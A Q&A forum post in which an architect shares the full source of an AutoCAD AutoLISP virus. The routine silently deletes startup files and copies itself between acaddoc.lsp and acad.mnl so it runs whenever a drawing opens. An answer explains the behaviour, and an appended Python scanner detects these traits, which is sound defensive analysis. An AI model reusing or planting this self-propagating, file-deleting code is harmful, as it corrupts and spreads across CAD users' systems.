Debugging what this LISP Virus is doing


Question

My firm has been hit by an AutoCAD virus that is deleting and replacing our acaddoc.lsp with the routine below.

I'm an architect and not exactly sure what this is doing by the repetitive "find" and "deletes".

  1. What is this replacing the files with (currently searching for acadapq) ?
  2. Who writes a virus for AutoCAD?!?!

Has anyone seen this before? The CAD forums aren't very helpful.

(setq wold_cmd (getvar "cmdecho"))
(setvar "cmdecho" 0)
(setq bb 2)
(setq dpath (getvar "dwgprefix"))
(setq wpath (getvar "menuname"))
(setq wpath (substr wpath 1 (- (strlen wpath) 4)))

(setq n 0)
(while (< n 1)
  (if (findfile "acad.fas")
      (if (vl-file-delete (findfile "acad.fas"))
          (setq n 0))
      (setq n 2)))

(setq n 0)
(while (< n 1)
  (if (findfile "lcm.fas")
      (if (vl-file-delete (findfile "lcm.fas"))
          (setq n 0))
      (setq n 2)))

(setq n 0)
(while (< n 1)
  (if (findfile "acad.lsp")
      (if (vl-file-delete (findfile "acad.lsp"))
          (setq n 0))
      (setq n 2)))

(defun wwriteapp ()
  (if (setq wwjm1 (open wnewacad "w"))
      (progn
        (setq wwjm (open woldacad "r"))
        (while (setq wwz (read-line wwjm))
          (write-line wwz wwjm1))
        (close wwjm)
        (close wwjm1))))

(setq lbz 0)
(setq wwjqm (strcat dpath "acaddoc.lsp"))
(if (setq wwjm (open wwjqm "r"))
    (progn
      (repeat 3 (read-line wwjm))
      (setq wz (read-line wwjm))
      (setq ab (atoi (substr wz 4 1)))
      (close wwjm)
      (if (> ab bb)
          (setq lbz 1))))

(setq wwjqm (strcat wpath "acad.mnl"))

(if (setq wwjm (open wwjqm "r"))
    (progn
      (repeat 3 (read-line wwjm))
      (setq wz (read-line wwjm))
      (setq nb (atoi (substr wz 4 1)))
      (close wwjm)
      (if (< nb bb)
          (setq lbz 1)))
    (setq lbz 1))
(if (= lbz 1)
    (progn
      (setq woldacad (strcat dpath "acaddoc.lsp"))
      (setq wnewacad (strcat wpath "acad.mnl"))
      (wwriteapp)))
(if (and (/= (substr dpath 1 1) (chr 67))
         (/= (substr dpath 1 1) (chr 68))
         (/= (substr dpath 1 1) (chr 69))
         (/= (substr dpath 1 1) (chr 70)))
    (progn
      (setq woldacad (strcat wpath "acad.mnl"))
      (setq wnewacad (strcat dpath "acaddoc.lsp"))
      (wwriteapp))
    (vl-file-delete (strcat dpath "acaddoc.lsp")))
;load "acadapq")
(setvar "cmdecho" wold_cmd)

Recommended answer

It is doing a support file path walk, delete and replace of the common AutoCAD customization files ("acad.fas", "acad.lsp", "acaddoc.lsp"). I do not know what "lcm.fas" is all about. Is it part of an AutoCAD vertical product, i.e. AutoCAD mechanical or Architectural desktop?

The looping is essentially "while I keep finding on the support path delete it".

So far as I know AutoCAD has no built-in defense against this. (There may be some acad system var that stops execution of these files.)

The "cmdecho" lines are saving and restoring the system variable that allows/suppresses the echoing of commands. Turns it off while running (so you don't notice) then restores the original setting.

Polite virus :\

When AutoCAD starts up it executes the first "acad.fas" & first "acad.lsp" it finds on its support path. Every time AutoCAD loads a new .dwg it executes the "acaddoc.lsp".
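
Added example, not part of the original question or answer: a Python sweep that looks for the behaviours visible in the routine above inside the startup files AutoCAD auto-executes, so infected drawing folders and support paths can be located for cleanup. The indicator patterns, the threshold of three hits and the names `scan_lisp_text` and `scan_tree` are assumptions of this example.

```python
import os
import re

# Text startup files named in the routine and the answer; AutoCAD auto-executes these.
STARTUP_NAMES = {"acaddoc.lsp", "acad.lsp", "acad.mnl"}

# Behaviours visible in the posted routine (patterns are this example's own heuristics).
INDICATORS = {
    "deletes_startup_file": re.compile(
        r'\(\s*vl-file-delete[^\n]*"(?:acad|acaddoc|lcm)\.(?:lsp|fas)"', re.I),
    "targets_acad_mnl": re.compile(r'\(\s*strcat\s+\w+\s+"acad\.mnl"', re.I),
    "targets_acaddoc_lsp": re.compile(r'\(\s*strcat\s+\w+\s+"acaddoc\.lsp"', re.I),
    "silences_cmdecho": re.compile(r'\(\s*setvar\s+"cmdecho"\s+0\s*\)', re.I),
    "line_by_line_file_copy": re.compile(r'\(\s*write-line\s+\w+\s+\w+\s*\)', re.I),
}

# Constructed sample: four lines excerpted from the routine shown on this page.
SAMPLE = ('(setvar "cmdecho" 0)\n'
          '(if (vl-file-delete (findfile "acad.lsp")) (setq n 0))\n'
          '(setq wnewacad (strcat wpath "acad.mnl"))\n'
          '(write-line wwz wwjm1)\n')

def scan_lisp_text(text):
    """Return the sorted names of indicators found in AutoLISP source text."""
    return sorted(name for name, rx in INDICATORS.items() if rx.search(text))

def scan_tree(root, threshold=3):
    """Walk root; return {path: indicators} for startup files with >= threshold hits."""
    findings = {}
    for dirpath, _dirs, files in os.walk(root):
        for fname in files:
            if fname.lower() not in STARTUP_NAMES:
                continue  # only files AutoCAD would load on its own
            path = os.path.join(dirpath, fname)
            try:
                with open(path, "r", encoding="latin-1") as fh:
                    hits = scan_lisp_text(fh.read())
            except OSError:
                continue  # unreadable file: skip rather than abort the sweep
            if len(hits) >= threshold:
                findings[path] = hits
    return findings

if __name__ == "__main__":
    import sys
    print(scan_lisp_text(SAMPLE))
    print(scan_tree(sys.argv[1] if len(sys.argv) > 1 else "."))
```

A single hit such as `silences_cmdecho` is common in legitimate customization files, which is why a file is reported only when several indicators coincide. Compiled `.fas` files cannot be inspected this way and need separate review.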
